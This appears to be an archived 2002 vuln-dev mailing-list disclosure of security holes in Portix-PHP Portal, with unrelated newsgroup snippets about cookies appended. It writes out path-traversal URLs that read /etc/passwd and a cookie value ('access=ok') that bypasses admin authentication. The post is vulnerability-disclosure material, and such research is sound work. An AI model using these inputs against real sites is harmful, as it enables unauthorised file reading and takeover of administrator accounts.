Big Security Holes in Portix-PHP Portal

From: frog frog (leseulfrog@hotmail.com)
Date: 01/31/02


Date: 31 Jan 2002 16:19:47 -0000
From: frog frog <leseulfrog@hotmail.com>
To: vuln-dev@securityfocus.com


('binary' encoding is not supported, stored as-is)

On all version. The last one is 0.4.02 .

To view files in the hard disk :

www.hostportix.com/index.php?l=../../../etc/passwd

www.hostportix.com/index.php?
l=forum/view.php&topic=../../../etc/passwd

To be administrator :
Send the cookie name=access value=ok
to /config/config.php .

Portix team has been alerted.



Relevant Pages

  • Re: iPhone programming data sharing? - SOLVED
    ... burt@xxxxxxxxxxxxxxxxx (Burt Johnson) writes: ... cannot access your hard disk with anything but its own cookie. ... and then proceed to send all your sensitive info to a malicious ...
    (comp.programming)
  • Re: Cookie Encoding/sharing ASP.Net and ASP
    ... SB> i have a little problem with cookie encoding. ... SB> cookie and have a problem with umlauts. ... SB> How can i save the username in the cookie with another encoding? ...
    (microsoft.public.dotnet.framework.aspnet)
  • Re: Cookie Encoding/sharing ASP.Net and ASP
    ... i have a little problem with cookie encoding. ... UTF-8/Unicode Encoding as default. ... Another web-app, written in ASP from another developer, read out the cookie ... tried things like Encoding.Convert(unicode,iso, encodedBytes) but it doesn´t ...
    (microsoft.public.dotnet.framework.aspnet)
  • Re: WTD: 2.5" Laptop HD
    ... Must be fully working no rattles ect.. ... I have an almost identical Toshiba Portege 3010CT. ... Experience shows that it works perfectly with a 30GB hard disk. ... Cookie - I have brand new sealed Toshiba 40GB IDE laptop drive up for sale at GBP22.50 all in if that helps. ...
    (uk.adverts.computer)
  • Re: Cookie Encoding/sharing ASP.Net and ASP
    ... now i have the name url-encoded in the cookie, ... The ASP-Developer says, ... UTF-8/Unicode Encoding as default. ... tried things like Encoding.Convert(unicode,iso, encodedBytes) but it doesn´t ...
    (microsoft.public.dotnet.framework.aspnet)